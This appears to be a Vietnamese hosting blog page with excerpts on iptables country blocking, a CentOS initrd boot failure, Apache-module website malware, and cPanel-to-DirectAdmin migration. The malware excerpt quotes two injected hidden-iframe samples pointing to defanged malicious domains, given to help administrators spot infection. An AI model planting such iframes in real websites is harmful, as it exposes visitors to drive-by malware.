vpsgiare5

Sử dụng VPS Linux, đôi khi chúng ta cần firewall để chặn truy cập từ 1 vùng, 1 quốc gia hay 1 IP ranges cụ thể. Điều này hoàn toàn đơn giản và dễ thực hiện với IP tables. 1. Các bước như sau: Lấy địa chỉ các IP ranges của 1 quốc gia từ link sau http://www.find-ip-address.org và cho vào 1 file gọi là country_IP Tạo 1 scripts với cú pháp như sau gọi là iptables_autoallow.sh #!/bin/bash   if [ -f country_IP ]   then   for IP_select in `cat country_IP`   do   iptables -A INPUT -s $IP_select -p tcp -j DROP   done   else   echo "Can't read country_IP"   fi Có thể add thêm các port cụ thể như port 22 iptables -A INPUT -s $IP_select -p tcp --dport 22 -j ACCEPT or iptables -A INPUT -s $IP_select -p tcp --dport 22 -j DROP Thay đổi quyền cho scripts và thực thi nó chmod 755 iptables_autoallow.sh sh iptables_autoallow.sh OK như vậy là đã hoàn thành xong cách chặn IP theo dải (IP range) sử dụng iptables rồi nhé. Chúc các bạn thành công. ...

Lỗi kinh điển này một ngày đẹp trời mà xuất hiện thì thật là ác mộng cho bất cứ một system admin nào, nó có thể là lời kết thúc cho hệ thống khi hệ điều hành không thể start. Mình đã gặp trường hợp này khi phải thay disk controller, sau khi thay và cắm lại ổ cứng cũ như ban đầu, OS dở chứng và báo thông báo lỗi trên. Lý do là do initrd (một root filesystem được load vào RAM) không tìm được các module cho driver của thiết bị mới, do vậy kernel không thể access thiết bị và OS sẽ nằm ở trạng thái treo! (Tất nhiên nếu kernel đã có những module built in cho tất cả các thiết bị thì nó cũng chẳng cần tới initrd image này nữa.) Lúc này ta cần 1 đĩa live CD để vào “giải cứu” Centos. -  To install or upgrade in graphical mode, press the <ENTER> key.          -  To install or upgrade in text mod, type: linux text <ENTER>.          -  Use the function keys listed below for more information.     ...

Có rất nhiều cách để chèn một đoạn mã độc vào website. Attacker có thể thay đổi bất cứ file nào trên web chẳng hạn như index.php, .htaccess hay php.ini. Đây là những cách phổ dụng nhất đặc biệt là với môi trường shared hosting. Tuy nhiên trong vòng 1 năm trở lại đây, 1 cách thức mới để chèn các đoạn mã độc này đã xuất hiện, đó là thông qua các Apache module Để xác định việc bị nhiễm thông qua Apache module, chúng ta hãy xem cách thức 1 iframe được chèn vào như sau: style<.t1nhuhjv { position:absolute; left:-1619px; top:-1270px} </style> <div class=”t1nhuhjv”><iframe src="httx://qotive. changeip.name/random/" width=”534″ height=”556″> </iframe></div> or <style>.q6umct6stl { position:absolute; left:-1284px; top:-1774px} </style> <divhttx://nujifa. longmusic.com/kdqjagzxwbakl/cdce48ffcf125f41206a9ed88675b56b/" width="367" height="411"></iframe></div> Domain name được thay đổi thư...

Khi thuê VPS, được sử dụng Cpanel là điều tuyệt vời. Tuy nhiên Cpanel lại có giá thành đắt hơn so với Direct Admin, vì thế đôi khi để giảm thiểu chi phí, ta cần chuyển toàn bộ hệ thống từ Cpanel sang Direct Admin, lúc đó thật sự cần một công cụ chuyển đổi toàn diện. Tool được giới thiệu trong bài viết này sẽ convert bản backup từ Cpanel (bao gồm cả backup bằng GUI tools và backup bằng /scripts/pkgacct script ) thành backup của Direct Admin. Sau đó dễ dàng restore lại trên Direct Admin. Các bước thực hiện như sau: 1. Download tool tại đây 2. Giải nén để có được 2 file là defaults.conf và da.cpanel.import.pl 3. Tạo 2 thư mục là export và import mkdir import export 4. Copy bản backup của Cpanel vào thư mục import cp cpanel-backup.tar.gz import 5. Edit file defaults.conf với thông tin duy nhất cần chính xác là IP và nameserver (dòng ns1 và ns2) 6. Chạy file da.cpanel.import.pl và làm theo chỉ dẫn ./da.cpanel.import.pl 7. Sau khi tool hoàn thành, 1 bản backup sẽ được s...